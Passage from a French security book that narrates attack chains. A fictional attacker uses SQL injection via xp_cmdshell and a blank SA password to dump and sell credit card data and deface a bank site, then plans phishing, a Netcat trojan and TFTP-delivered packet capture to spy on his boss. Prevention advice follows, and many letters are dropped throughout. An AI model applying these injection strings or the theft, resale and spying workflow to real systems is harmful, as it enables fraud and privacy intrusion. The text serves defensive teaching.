Phnix essaie denvoyer la sortie de sa commande dans un nouveau chier texte sur le serveur. Lemplacement par dfaut dun site web sous Microsoft IIS 5.0 Server est c:\inetpub\wwwroot. Phnix envoie la sortie de cette commande dans un chier enregistr dans ce rpertoire pour pouvoir lafcher dans son navigateur web. Sa commande OSQL complte est :
osql -U sa -P "" -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot

Cependant, Phnix na pas encore termin. OSQL est un outil en ligne de commande et doit donc tre utilis partir dune invite de commande MS-DOS. Or, Phnix nest pas sur une invite de commande sur le serveur : il accde un formulaire web sur le site

Chapitre 1

Tent par une carte de crdit gratuite ?

13

web de dveloppement. Heureusement pour lui, Microsoft inclut des procdures stockes qui sont des commandes SQL prcompiles. Une de ces procdures est xp_cmdshell, qui permet de saisir une commande depuis une invite de commande SQL. Pour excuter cette procdure stocke, Phnix saisirait :
exec xp_cmdshell <insrer une commande ici>

En assemblant tout ce qui prcde, Phnix saisit la commande complte suivante dans le champ du nom dutilisateur :
; exec xp_cmdshell osql -U sa -P "" -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\output.txt--

Cette commande assemble de nombreux lments. La Figure 1.2 rsume la procdure suivie par Phnix pour enquter sur la base de donnes. Il accde au site web de dveloppement, ce qui lui permet de saisir des commandes SQL. Il excute la procdure stocke xp_cmdshell, qui lui permet dutiliser loutil en ligne de commande OSQL. Il utilise OSQL pour pouvoir entrer une commande SQL et envoyer la sortie vers un chier texte. La sortie est envoye dans un chier texte accessible depuis son navigateur web.

Site web exex xp_cmdshell

Commande OSQL

Envoi de la sortie dans un fichier texte Visualisation dans un navigateur web

Figure 1.2
Rsum logique de lenqute sur les bases de donnes SQL.

14

Chanes dexploits

Phnix clique sur le bouton Connexion. Quelques secondes plus tard, la page web renvoie un message derreur "Ne peut pas afcher cette page web". Phnix ne sen inquite pas : il sait que cela signie que la commande sest excute avec succs. Le site web a renvoy cette page car il sattendait un nom dutilisateur et un mot de passe et non la commande SQL saisie par Phnix. Phnix tape ladresse http://www.pbxonancial.com/ output.txt pour voir la sortie de sa commande SQL. En voici une partie :
name dbid sid mode status status2 crdate reserved category filename

cmptlevel

version --------------------------------------------------------------------------------------------------------------------------- ------ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------ ----------- ----------- ----------------------- ----------------------- ----------- --------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----creditcard 7 0x01050000000000051500000093E36248D1DA740307E53B2BF4010000 0 16 1090519040 2008-08-31 17:05:45.717 1900-01-01 00:00:00.000 0 80 C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF

539 master 1 0x01 0 24 1090519040 2000-08-06 01:29:12.250 1900-01-01 00:00:00.000 0 80 C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf

539

Chapitre 1

Tent par une carte de crdit gratuite ?

15

Phnix a trouv ce quil cherchait. Il existe une base de donnes nomme creditcards. La sortie indique mme Phnix le chemin du chier de la base de donnes, en loccurrence C:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF. Phnix doit maintenant dterminer la liste des noms de tables dans la base de donnes de cartes de crdit. La commande pour dresser la liste des noms de tables est :
select * from creditcards..sysobjects

Phnix revient la page de connexion et saisit la commande complte pour obtenir la liste des tables et lenvoyer vers un chier texte :
; exec xp_cmdshell osql -U sa -P "" -Q "select * from creditcards..sysobjects" -o c:\inetpub\wwwroot\tables.txt--

Aprs avoir cliqu sur Connexion, Phnix attend quelques secondes que la commande se termine. Comme prcdemment, rien ne safche sur son cran part un message Page non trouve, mais il sait que la sortie est envoye vers tables.txt. Il afche la page www.PDXOnancial.com/tables.txt dans son navigateur web. Quelques pages de texte remplissent son cran. Il les parcourt jusqu trouver une table qui pourrait contenir les numros de carte de crdit. Il nit par trouver ce qui suit :
userinfo 1 2 1610612736 2008-08-31 17:05:46.763 1 67 0 0 0 useraccounts 1 2 1610612736 2008-08-31 17:07:59.247 1 67 0 0 0 cardnumbers cardnumbers 1 4 1610612736 2008-08-31 17:08:33.733 1 67 0 0 0 dtproperties 1 7 -536862427 0 0 0 2008-08-31 17:08:33.733 0 0 16 2025058250 U 0 0 0 U 0 0 0 1993058136 U 0 0 0 0 0 0 U 2008-08-31 17:05:46.763 0 0 0 0 0 2009058193 U 0 0 0 0 0 0 U 2008-08-31 17:07:59.247 0 0 0 0 0

2057058364 U 0 0

2008-09-01 09:17:59.357 0 16 0 U 1 8275 0 2008-09-01 09:17:59.357 0 0 0 0 0 2563 0

16

Chanes dexploits

Il aperoit la table nomme cardnumbers. Jackpot ! Il doit maintenant extraire les valeurs des cartes de crdit partir de cette table. Voler des numros de cartes de crdit partir du site web Chaque ligne dune table est un compte de carte de crdit. La premire tape pour voler les numros de cartes de crdit est de slectionner toutes les lignes de la table des cartes de crdit. Pour slectionner toutes les lignes, la commande est :
select * from creditcards..cardnumbers

Il retourne la page de connexion, saisit la commande suivante pour envoyer les informations de la table des numros de carte dans un chier nomm cards.txt :
; exec xp_cmdshell osql -U sa -P "" -Q "select * from creditcards..cardnumbers" -o c:\inetpub\wwwroot\cards.txt--

Phnix laisse chapper un lger sourire en se prparant voir ses rsultats. Il pointe son navigateur web vers www.PDXOnancial.com/cards.txt. Il est bahi par ce quil obtient : le chier texte contient non seulement les numros, mais aussi le nom des titulaires des comptes, les dates dexpiration et les codes de vrication CCV de lenvers des cartes ! Voici une sortie partielle de ce qui apparat sur son cran :
CardName CardNumber ExpiryDate Code ---------------------------------------------- -------------- ----------------------- ---- Ernesta Lauffer 34565678901234 2010-12-12 00:00:00.000 3456 Eddy David 34561125556845 2010-05-05 00:00:00.000 4486 Haidee Steele 34564488956644 2012-05-07 00:00:00.000 4452 Erykah Morgan 34561558899553 2009-04-08 00:00:00.000 1125 Rhianna Tomey 43561189887556 2012-12-04 00:00:00.000 1657 Sapphira Catherina 34561122544589 2009-04-08 00:00:00.000 9542

Chapitre 1

Tent par une carte de crdit gratuite ?

17

Cordula Jackson 34561891716586 2010-12-16 00:00:00.000 1564 Mark Tanner 34561189884158 2011-09-18 00:00:00.000 5648 Mansel Peters 34565489474498 2012-09-09 00:00:00.000 1568 Christopher Smith 34567874466884 2009-07-06 00:00:00.000 5644 Derrick Gianna 43215484568798 2011-04-18 00:00:00.000 5448

Phnix enregistre ce chier sur son disque dur local. Vente des informations de cartes de crdit sur le march noir Phnix possde des numros de cartes de crdit : il peut commencer chercher un acqureur potentiel pour ces informations. Il lance News Rover, une application courante de lecture de groupes Usenet, et se connecte au groupe alt.2600. Il sagit dun groupe de discussion des lecteurs du magazine 2600 (http://www.2600.com), un magazine populaire traitant de piratage tlphonique et informatique. Phnix poste un message au sujet de ses cartes car il sait quil atteindra un grand nombre de personnes potentiellement intresses par ce type dinformations. Phnix sinquite cependant du fait que le groupe est public et que son message pourrait attirer lil des autorits. Il ne peut videmment pas utiliser son adresse de courrier lectronique personnelle : il met donc en place rapidement un compte Gmail anonyme appel voscartesici@gmail.com. Il sait quil ne peut pas se contenter de proposer de vendre ses cartes de crdit : la police lattraperait vite. Il visite plutt le site www.spammimic.com. Ce site convertit une chane de caractres en un message qui a lapparence dun spam, mais qui contient en fait votre message. La Figure 1.3 illustre le site web Spammimic. Il propose des options supplmentaires comme le codage avec un mot de passe, le codage sous forme de faux message PGP ou le codage sous forme de faux texte crit en russe. Aprs avoir cliqu sur le bouton Codage, il obtient le rsultat prsent la Figure 1.4. Ce message ressemble un spam typique, mais les utilisateurs familiers de ce site sauront prendre le message et le dcoder sur le site web de Spammimic.

18

Chanes dexploits

Figure 1.3
Spammimic.

Figure 1.4
Message cod.

Chapitre 1

Tent par une carte de crdit gratuite ?

19

Phnix copie le message cod et le poste sur le groupe alt.2600. Phnix na plus qu attendre que quelquun voie son message et y rponde. Le fait que son message ressemble un spam ne linquite pas : les gens qui consultent ce type de groupe savent quil faut copier ces spams sur le site web de Spammimic. Lorsque quelquun copie le texte sur le site web de Spammimic et clique sur le bouton Decode, il obtient ce message :
"Cartes de crdit vendre. Envoyez-moi un message voscartesici@gmail.com. 12 000 $ pour 50 000 cartes avec noms, codes de vrication CCV et dates dexpiration."

Le lendemain, Phnix ouvre sa bote aux lettres lectronique et dcouvre quatre messages dacqureurs potentiels. Il rpond au premier message et organise le paiement vers un compte bancaire en Suisse. En quelques heures, largent est transfr et Phnix dispose de 12 000 $. Ces 12 000 $ sont sufsants pour payer ses dettes ; il signe donc un chque de 12 000 $ la banque nancire PDXO. Il ralise galement quil vient de donner son numro de carte de crdit un inconnu et fait immdiatement opposition sur sa carte. Phnix aurait certes pu gagner beaucoup plus dargent en utilisant les cartes de crdit. Il est cependant bien plus simple de tracer la personne qui utilise les cartes voles que celle qui les a vendues. Dfaage du site web PDXO prsent que Phnix a vol les numros de cartes de crdit, il souhaite dfacer le site web de la banque pour donner une bonne leon lentreprise. Son but est denvoyer la banque le message quelle ne devrait pas augmenter les taux dintrt sous peine de devoir en subir les consquences. Dfacer un site web est une attaque courante utilise par les pirates malveillants lorsquils veulent faire passer un message. Il sagit souvent dune forme dhacktivism : les pirates dfacent un site pour des raisons politiques ou religieuses. Dans ce cas, Phnix proteste contre laugmentation rcente du taux dintrt des cartes de crdit. Phnix retourne sur le site web de la banque. Il dispose actuellement des informations suivantes sur le site :
m m

Il fonctionne grce un serveur Microsoft IIS 5.0. Il utilise Microsoft SQL Server.

20

Chanes dexploits

m m m

Le serveur SQL utilise le nom dutilisateur par dfaut, SA, sans mot de passe. Le serveur SQL est excut sur le mme ordinateur que le site web. Les procdures stockes se trouvent sur le serveur, ce qui lui permet dutiliser la commande xp_cmdshell.

Dans lattaque prcdente, Phnix a utilis la procdure stocke xp_cmdshell pour copier les cartes de crdit dans un chier texte. Il va essayer dutiliser la mme procdure stocke pour craser la page daccueil par dfaut du site web. Par dfaut, sous IIS 5.0, la page daccueil est installe dans le rpertoire c:\inetpub\wwwroot et sappelle default.asp. Il est conseill de modier lemplacement de la page daccueil : la laisser lemplacement par dfaut facilite la tche des pirates qui souhaitent laltrer. tant donn les autres faiblesses du site, y compris installer Microsoft SQL Server sur le mme ordinateur quIIS 5.0, garder la base de donnes de cartes de crdit sur la partition C plutt que sur une partition spare et utiliser le chemin dinstallation par dfaut c:\inetpub\wwwroot, Phnix sait que le dfaage du site sera facile. Il suft dune seule commande dans le champ du nom dutilisateur sur le site web :
; exec xp_cmdshell echo Vous avez t pirat! > c:\inetpub\wwwroot\default.asp--

Cette commande crase la page default.asp par dfaut et la remplace par une page qui afche "Vous avez t pirat !". Phnix a du mal croire quel point cela a t simple.
INFO Vous pouvez consulter des copies archives de nombreux sites dfacs en visitant http:// www.zone-h.org. Vous y trouverez des pages dfaces dans le monde entier, y compris des pages appartenant des gouvernements et des organisations militaires.

Rsum de la chane dexploits Le mode opratoire de Phnix est rsum par les tapes suivantes : 1. Phnix a enqut sur le site web pour rassembler un maximum dinformations, notamment sur le systme dexploitation et la version du serveur web. 2. Il a ensuite enqut sur la base de donnes des cartes de crdit pour connatre les noms des tables de la base de donnes. 3. Grce une injection SQL, Phnix a vol la base de donnes de cartes de crdit partir du site web de la banque.

Chapitre 1

Tent par une carte de crdit gratuite ?

21

4. Phnix a post un message sur un groupe Usenet pour vendre les cartes de crdit. 5. Pour nir, il a dfac le site web.

Mesures de prvention
Si vous avez un site web qui enregistre des informations de cartes de crdit, vous courez peut-tre le risque dune attaque du type de celle qui a t mene par Phnix dans ce chapitre. Heureusement, diverses mesures peuvent vous aider vous protger contre ce type dattaques. Changez len-tte de rponse HTTP par dfaut Plus tt dans ce chapitre, Phnix a pu dterminer que le site web cible faisait tourner Microsoft IIS. Cela la aid deviner que le serveur de bases de donnes utilisait Microsoft SQL Server (il est frquent, dans un environnement Microsoft, dutiliser IIS avec SQL Server). Phnix a obtenu cette information en envoyant une requte HTTP HEAD et en en lisant la rponse. Vous pouvez modier cette rponse sur votre serveur web de sorte que des informations incorrectes soient renvoyes aux potentiels pirates pour les embrouiller. Vous pouvez pour cela utiliser URLScan, qui vous permet de supprimer len-tte HTTP par dfaut du serveur et dy substituer une chane personnalise. URLScan est un utilitaire Microsoft que vous pouvez tlcharger sur le site web de Microsoft. Pour plus dinformations sur cet utilitaire pratique, consultez http:// support.microsoft.com/kb/q307608/. Nayez pas daccs public aux sites web de dveloppement Dans ce chapitre, Phnix a russi pntrer dans la banque grce au site de dveloppement. Il est courant pour les dveloppeurs de congurer des sites temporaires pour tester avant de mettre jour le code sur le site de production. Le danger est quun dveloppeur ne mette pas en uvre le mme niveau de scurit contre les attaques. Vous ne devez jamais autoriser un accs public aux sites temporaires de dveloppement. Tous les sites de dveloppement devraient se trouver sur un rseau spar, interne lorganisation. De plus, le site de dveloppement ne doit pas tre li au rseau de lentreprise an de vous prmunir des attaques internes. Idalement, vous devriez avoir un rseau spar pour le dveloppement, un pour les tests de qualit et un troisime pour le site de production.

22

Chanes dexploits

Ninstallez pas SQL Server sur le mme ordinateur quIIS Phnix a pu excuter les commandes de son attaque car le serveur SQL tait install sur le mme ordinateur que le serveur web IIS. SQL Serveur devrait tre install sur un ordinateur diffrent pour quil soit plus difcile aux attaquants dexcuter des commandes SQL via un site web. Vriez les saisies sur les formulaires web Phnix a saisi directement des commandes SQL via un formulaire web. Cela est trs dangereux. Un formulaire web ne devrait accepter quun certain nombre et un certain type de caractres. Il aurait par exemple t bien plus difcile pour Phnix de mener bien son attaque si le champ navait accept que huit caractres alphanumriques. Phnix aurait pu contourner cette limitation, mais cette mesure lui aurait compliqu la tche. Ninstallez pas IIS lemplacement par dfaut Dans cet exemple, IIS tait install dans lemplacement par dfaut, c:\inetpub\wwwroot. Cela est dangereux car trop prvisible : les pirates peuvent altrer les pages web et en crer de nouvelles car ils connaissent le chemin sur le disque des sites web. Ninstallez jamais IIS cet emplacement. Installez-le galement sur une partition diffrente de la partition C. Cela vite certaines attaques de traverse de rpertoires (non discutes dans ce chapitre). Passez votre site web en lecture seule Si possible, passez votre site web en lecture seule. Phnix a pu envoyer la sortie de ses commandes SQL un nouveau chier quil avait cr. Si les rpertoires avaient t en lecture seule, Phnix naurait pas pu crer de nouveaux chiers. Supprimez les procdures stockes inutiles de votre base SQL Phnix a utilis la procdure stocke xp_cmdshell pour excuter son attaque. Si vous navez pas besoin des procdures stockes par dfaut de Microsoft, supprimez-les de votre base de donnes. Cest cependant une contre-mesure mineure, au sens o il existe des commandes permettant de recrer ces procdures par dfaut. Cest galement difcile dans de nombreux environnements qui font appel aux procdures stockes Microsoft pour grer leurs bases de donnes. Cest nanmoins une option envisager.

Chapitre 1

Tent par une carte de crdit gratuite ?

23

Nutilisez pas de nom dutilisateur et de mot de passe par dfaut pour votre base de donnes Phnix a pu entrer dans la base de donnes car celle-ci utilisait le nom dutilisateur par dfaut, SA, et le mot de passe vide par dfaut. Dans les versions ultrieures de SQL Server, ce nest plus le cas et vous devez saisir un nom dutilisateur et un mot de passe. Mais les versions plus anciennes avaient comme utilisateur par dfaut SA, sans mot de passe. Lorsque vous installez SQL Server, assurez-vous de toujours utiliser un mot de passe sr. Mesures de prvention pour les particuliers En plus de ces mesures pour les entreprises, les particuliers peuvent aussi bncier de quelques considrations. Aucune dentre elles naurait pu viter lattaque dcrite dans ce chapitre, mais il sagit dastuces utiles pour vous aider tre un consommateur intelligent.
Vriez frquemment votre compte bancaire Examinez frquemment votre compte bancaire en recherchant des mouvements suspects. Cherchez les achats dont vous navez pas connaissance ou les modications soudaines de votre solde : ils peuvent tre des signes que votre compte est peut-tre compromis. Ne partez pas du principe quun ventuel pirate ne fait que des achats coteux. Il commencera souvent avec quelques achats minimes pour vrier que votre compte est valide et quil peut utiliser votre carte sans attirer lattention. Vriez toutes les transactions, quelle que soit leur taille. Achetez une assurance de carte de crdit La plupart des institutions nancires offrent une assurance pour vous protger en cas de problme de scurit. Beaucoup offrent mme ce service gratuitement. Renseignezvous auprs de votre banque pour connatre votre assurance en cas de vol de carte. Nenregistrez jamais le mot de passe du site web de votre banque Certains navigateurs web populaires vous offrent la possibilit de sauvegarder votre mot de passe lorsque vous visitez certains sites. Nenregistrez jamais le mot de passe de votre site de banque en ligne : cela permettrait quiconque accdant votre ordinateur de se connecter automatiquement votre compte en banque. Cette contre-mesure nviterait pas lattaque de Phnix dans ce chapitre, mais vous ne devriez jamais enregistrer ce mot de passe, au cas o votre ordinateur serait vol.

24

Chanes dexploits

Ayez un compte bancaire de rserve Si votre compte bancaire est compromis, votre banque peut le fermer. Il est possible que vous nayez plus accs aux fonds pendant quelque temps jusqu ce quun nouveau compte soit ouvert et quune nouvelle carte soit mise votre nom. Assurez-vous donc de disposer dun compte en banque de rserve que vous pourrez utiliser pendant que vous attendez la nouvelle carte. Esprons que vous nen aurez jamais besoin, mais cest une bonne ide que de disposer dun compte supplmentaire avec sufsamment de fonds pour subsister quelque temps avant de rgler une telle situation.

Conclusion
Lattaque de Phnix dans ce chapitre nest quune des multiples manires quutilisent les pirates pour compromettre les sites de banques. Chaque anne, ces attaques cotent des millions en pertes aux banques. La plupart des faiblesses de la banque ctive de ce chapitre sont le rsultat de mauvaises politiques administratives plus que de mauvaises technologies. La scurit doit venir du sommet de la hirarchie, et cela signie que ladite hirarchie doit reconnatre limportance de la scurit et souligner cette importance tous les niveaux de lorganisation. Les audits de code et dinfrastructures devraient avoir la mme valeur que la production de code et la mise en uvre du rseau. Si la hirarchie de la banque nancire PDXO avait reconnu cela et stait assure que des processus garantissant la scurit taient en place avant de passer le code en production, aucune des vulnrabilits dcrites dans ce chapitre naurait exist.

2
Espionner votre chef
Scnario
Phnix serre les poings en lisant la note sur son bureau. Cest la goutte deau qui fait dborder le vase, pense-t-il en chiffonnant la note et en la jetant la poubelle. Il sagit dun mmo de son chef, M. Vtille, dclarant quil a t port son attention que plusieurs employs utilisaient leurs ordinateurs pour envoyer des courriers lectroniques personnels. Le chef de Phnix va donc surveiller toutes les communications. Au cas o il dcouvrirait le moindre courrier non professionnel, lemploy mis en cause serait svrement rprimand par les ressources humaines. Mais la note ne sarrte pas l. Elle continue en afrmant que certains employs surfent sur Internet pour leur usage personnel pendant les heures de travail, ce qui est contraire aux rgles de lentreprise. Par consquent, Phnix na plus le droit de vider lhistorique de son navigateur web an que son chef puisse venir le vrier priodiquement. Phnix sait que M. Vtille lespionne depuis quelque temps dj. Il a lhabitude de voir son chef son bureau, brassant ses papiers, lorsquil sabsente pour aller la photocopieuse par exemple. Il a galement remarqu que M. Vtille sapprochait de son bureau lorsquil tait au tlphone pour espionner ses conversations. M. Vtille a dcid de passer ltape suivante : maintenant, il lit les courriers lectroniques de Phnix et examine les sites web quil consulte. Le mot "hypocrite" rsonne dans la tte de Phnix. Il sait que son chef passe lui-mme la plupart de son temps surfer sur Internet. Il ne sait pas exactement ce que M. Vtille consulte, mais il est dtermin le dcouvrir. Il souponne que tout nest pas li au

26

Chanes dexploits

cadre professionnel. Phnix pourra ensuite lui rendre la monnaie de sa pice et exposer ses habitudes de surf sur Internet tout le monde. Il commence donc laborer son plan pour espionner son chef. La Figure 2.1 illustre le bureau du scnario de Phnix.

Internet

192.168.1.5 Ordinateur de M. Vtille

192.168.1.6 Ordinateur de Phnix

Figure 2.1
Diagramme de la topologie pour le scnario.

Approche
Comme la plupart des attaques de ce livre, il existe plusieurs mthodes pour lancer lattaque de Phnix. Le but de Phnix est de surveiller le trac en provenance et destination de lordinateur de M. Vtille. En dcidant de la mthode, Phnix doit considrer le "bruit" induit par la mthode sur le rseau. Les attaques dtectes facilement par les systmes de dtection ou de prvention dintrusion (IDS/IPS, Intrusion Detection Systems/Intrusion Protection Systems) sont "bruyantes" : elles dclenchent des alarmes et avertissent les administrateurs de leur existence. Cela peut tre un effet souhait, par exemple dans le cas dune attaque de diversion lorsque le pirate lance une attaque plus furtive en parallle. Dans la majorit des cas, cependant, vous souhaiterez lancer une attaque qui ne sera pas dtecte simplement par un logiciel de dtection dintrusion. Phnix veut attaquer de manire prcise et silencieuse.

Chapitre 2

Espionner votre chef

27

Utilit des approches "bruyantes" Une mthode bruyante dclenchera probablement des alarmes sur les systmes de dtection ou de prvention dintrusion, mais cest parfois la seule manire de visualiser le trafic dun rseau. Une approche "bruyante" est utile lorsquun attaquant veut voir tout le trafic dun rseau. Pour en savoir plus sur les options "bruyantes" ncessaires un attaquant pour voir le trafic dans un rseau commut, reportez-vous la section "Pour plus dinformations" de ce chapitre.

La plupart des rseaux utilisent des commutateurs (switches), qui nenvoient le trac quen provenance et destination des quipements censs communiquer entre eux. Le reste du rseau ne voit pas ncessairement les communications entre deux ordinateurs : Phnix ne peut pas voir ce trac sans une attaque planie. Pour comprendre lattaque de Phnix, vous devez comprendre comment fonctionne un commutateur. Sur la Figure 2.2, lorsque lutilisateur A envoie une trame lutilisateur B, le commutateur enregistre ladresse MAC (Media Access Control, contrle daccs au mdia) de lutilisateur A dans sa table dadresses MAC. Il cherche ensuite ladresse MAC de destination (utilisateur B) dans sa table. Sil ne la trouve pas, le commutateur transfre la trame tous les ports (Fa0/2 et Fa0/3, dans notre exemple).

Table d'adresses MAC FA 0/1 Commutateur FA 0/2 Fa0/1 Fa0/2 Fa0/3 FA 0/3 ??? ??? 01C9:44BB:00A1 (Utilisateur A)

Utilisateur A

Utilisateur B

Utilisateur C

Figure 2.2
Mode opratoire dun commutateur, Partie 1.

28

Chanes dexploits

Observez prsent la Figure 2.3. Dans cette gure, lutilisateur B renvoie du trac A. Le commutateur enregistre ladresse MAC source (celle de lutilisateur B) dans sa table dadresses MAC et cherche ladresse MAC de destination (celle de lutilisateur A). Comme il dispose dun enregistrement pour lutilisateur A, il nenvoie la trame qu lutilisateur A via Fa0/1. Lutilisateur C, connect Fa0/3, ne reoit pas le trac entre les utilisateurs A et B. Si Phnix est lutilisateur C, il ne voit pas le trac de M. Vtille. Mais cela va changer.

Table d'adresses MAC FA 0/1 FA 0/2 FA 0/3 Commutateur 01C9:44BB:00A1 (Utilisateur A) 0BB0:0E44:2221 (Utilisateur B) ???

Fa0/1

Fa0/2

Fa0/3

Utilisateur A

Utilisateur B

Utilisateur C

Figure 2.3
Mode opratoire dun commutateur, Partie 2.

Si vous tes lutilisateur C et si vous souhaitez voir le trac entre les utilisateurs A et B, plusieurs mthodes "bruyantes" sont envisageables :
m m m

lempoisonnement de cache ARP (ARP poisoning) ; lusurpation dadresse MAC (MAC spoong) ; linondation dadresses MAC (MAC ooding).

Chapitre 2

Espionner votre chef

29

Ces mthodes "bruyantes" seront dtailles dans la section suivante, mais lapproche de Phnix est diffrente. Il envisage en effet une approche plus silencieuse pour viter dtre dtect. Comme il veut capturer le trac dun seul utilisateur, il ne lui est pas ncessaire de faire appel lempoisonnement ARP, lusurpation dadresse MAC ou linondation dadresses MAC. Il va plutt chaner plusieurs exploits pour que M. Vtille installe son insu un logiciel de capture de paquets sur son ordinateur. Mais son chef ninstallera pas aveuglment un logiciel quil ne reconnat pas, Phnix va donc mettre en place un pige par hameonnage pour faire croire son chef quil installe un logiciel lgitime. On parle dhameonnage lorsquun utilisateur est amen aller sur un site web qui ressemble un site lgitime, alors quil sagit dun site gr par un pirate malveillant. Lhameonnage est souvent utilis pour rcuprer des informations de connexion : lutilisateur se connecte au site web pensant quil sagit dun site de conance. Phnix utilise cette technique pour que son chef tlcharge un logiciel apparemment lgitime. Le logiciel tlcharg par M. Vtille depuis le site servant lhameonnage sera li un cheval de Troie logiciel que Phnix utilisera pour tablir un point dentre dans lordinateur de son chef. Celui-ci ne sera nullement conscient de la prsence du cheval de Troie. Une fois connect, Phnix utilisera le protocole TFTP (Trivial File Transfer Protocol, protocole de transfert de chiers trivial) pour tlcharger un outil de capture de paquets en ligne de commandes. Cet outil capturera le trac de lordinateur et lenregistrera dans un chier de journalisation que Phnix transfrera sur son ordinateur. De retour sur sa machine, Phnix pourra ouvrir le chier de journalisation et voir ce que son chef aura fait. Comme il aura transfr aussi bien des images que du texte, Phnix pourra rassembler le chier image grce un diteur hexadcimal pour pouvoir voir les images consultes par son chef. En rsum, Phnix suivra les tapes suivantes : 1. copier un site web et lhberger sur le serveur de Phnix ; 2. lier un cheval de Troie (Netcat) un excutable lgitime ; 3. envoyer un courrier lectronique son chef, M. Vtille, lui demandant de tlcharger lexcutable gratuit (son chef installera lexcutable et, par consquent, Netcat) ;

30

Chanes dexploits

4. utiliser Netcat pour se connecter la machine de son chef ; 5. utiliser TFTP pour tlcharger WinDump sur lordinateur de son chef ; 6. capturer le trac de son chef alors quil surfe sur le web ; 7. analyser le trac envoy et reu par lordinateur de son chef grce Wireshark ; 8. utiliser un diteur hexadcimal pour reconstruire une image (.JPG) capture par WinDump.

Pour plus dinformations


Mme si ce nest pas lapproche choisie par Phnix, cette section fournit des informations supplmentaires sur trois approches "bruyantes" quun attaquant peut utiliser pour voir du trac commut :
m m m

lempoisonnement de cache ARP (Address Resolution Protocol) (ARP poisoning) ; lusurpation dadresse MAC (MAC spoong) ; linondation dadresses MAC (MAC ooding).

Cette liste nest pas exhaustive. Il existe dautres techniques parmi lesquelles on compte diverses variantes dempoisonnement ARP ou de rplication de ports (analyseur de ports commuts ou SPAN). Pour plus dinformations sur ces outils, reportez-vous au Chapitre 10, "Attacking the Network", de louvrage Penetration Testing and Network Defense dAndrew Whitaker et Daniel P. Newman (Cisco Press, 2006). La Figure 2.4 illustre la premire mthode, lempoisonnement ARP. Phnix envoie un message ARP forg chaque hte quil souhaite surveiller. Il sagit dun message ARP non sollicit. En temps normal, si Utilisateur A veut communiquer avec Utilisateur B (10.0.0.12), il commence par envoyer une requte ARP sur le rseau pour demander ladresse MAC de 10.0.0.12. En recevant la requte ARP, Utilisateur B renverrait une rponse ARP contenant son adresse MAC. Phnix peut intercepter tout le trac envoy Utilisateur B en envoyant un message ARP non sollicit qui annonce ladresse MAC de Phnix pour ladresse 10.0.0.12. Phnix peut voir le trac destin aux autres htes en envoyant des messages ARP pour chacun des htes du rseau.

Chapitre 2

Espionner votre chef

31

Table d'adresses MAC FA 0/1 FA 0/2 FA 0/3 01C9:44BB:00A1 (UTILISATEUR A) 0BB0:0E44:2221 (UTILISATEUR B) 0123:0B32:900A

Fa0/1

Fa0/2

Fa0/3

Envoie un messages ARP forg pour 10.0.0.12 en utilisant sa propre adresse MAC

Utilisateur A 10.0.0.11

Utilisateur B 10.0.0.12

Utilisateur C 10.0.0.13

Figure 2.4
Messages ARP forgs.

La deuxime mthode, variante de lempoisonnement ARP, consiste usurper ladresse MAC dun hte (voir Figure 2.5). Cest une technique souvent utilise pour la passerelle par dfaut ou le routeur dun rseau. Dans cet exemple, Phnix (Utilisateur C) usurpe ladresse MAC du routeur. Lorsquil voit passer une requte ARP pour 10.0.0.1, il rpond avec la mme adresse MAC que celle du routeur. Lorsquune trame est envoye par Utilisateur A sur Internet, elle est envoye ladresse MAC 0040:5B50:387E. Le commutateur, voyant ladresse MAC du routeur, transmet la trame via les ports Fa0/3 et Fa0/4 au routeur et lordinateur de Phnix. Cette approche ne montre pas Phnix tout le trac du rseau, mais elle lui afche tout le trac destin sortir de votre rseau. La troisime technique est linondation dadresses MAC. Comme vous lavez dj appris, les commutateurs maintiennent une table dadresses MAC. La table dadresses MAC rduit lengorgement en envoyant le trac uniquement aux ports appropris. En inondant la table dadresses MAC avec des adresses fausses, celle-ci ne contiendra plus les enregistrements des htes lgitimes. Par consquent, le commutateur se comportera comme un concentrateur (hub) et enverra le trac sur tous les ports.

32

Chanes dexploits

Table d'adresses MAC FA 0/1 FA 0/2 FA 0/3 FA 0/4 01C9:44BB:00A1 (UTILISATEUR A) 0BB0:0E44:2221 (UTILISATEUR B) 0040:5B50:387E (usurpe) 0040:5B50:387E (routeur)

Fa0/4 Rponse ARP Fa0/1 Fa0/2 Fa0/3 Routeur 10.0.0.1 Rponse ARP

Utilisateur A 10.0.0.11

Utilisateur B 10.0.0.12

Utilisateur C 10.0.0.13

Figure 2.5
Usurpation dadresse MAC.

Pour Phnix, lattaquant, cela facilite lespionnage de tout le trac, mme sil nen tait pas le destinataire. La Figure 2.6 est une capture dcran de MACOF (http:// monkey.org/~dugsong/dsniff/), un des nombreux outils que vous pouvez utiliser pour inonder un rseau commut. Ces trois mthodes sont certes trop bruyantes pour les buts poursuivis par Phnix, mais elles permettent dexpliquer les lments fondamentaux du trac commut quun attaquant peut exploiter. La section suivante commence traiter de la chane dexploits de Phnix en dtail.

Chapitre 2

Espionner votre chef

33

Figure 2.6
Inondation dadresses MAC.

Chane dexploits
Cette section inclut les dtails de toutes les tapes de la chane dexploits de Phnix, cest--dire :
m m m m m m m

le pige par hameonnage ; linstallation dexcutables ; la mise en place du site servant lhameonnage ; lenvoi dun courrier lectronique M. Vtille ; la recherche de lordinateur cible ; la connexion lordinateur cible ; WinPcap ;

34

Chanes dexploits

m m m

lanalyse des paquets capturs ; le rassemblage dimages ; les autres possibilits.

Cette section se termine par un rsum de la chane dexploits. Pige par hameonnage Phnix cherche tout dabord piger M. Vtille pour quil tlcharge un excutable contenant Netcat. Netcat est un cheval de Troie que Phnix utilisera pour se connecter lordinateur de son chef1.
Copier un site web lgitime Phnix doit dabord trouver un site web qui intressera son chef. Il la entendu dire quil voulait tenter de passer la certication Cisco CCNA et dcide dutiliser un site web, certicationpractice.com, qui offre un logiciel dentranement lexamen CCNA pour une priode limite en tant quoffre promotionnelle (voir Figure 2.7).
INFO certicationpractice.com nest pas un site web rel lheure o nous crivons ces lignes. Il est seulement utilis titre dillustration dans ce chapitre.

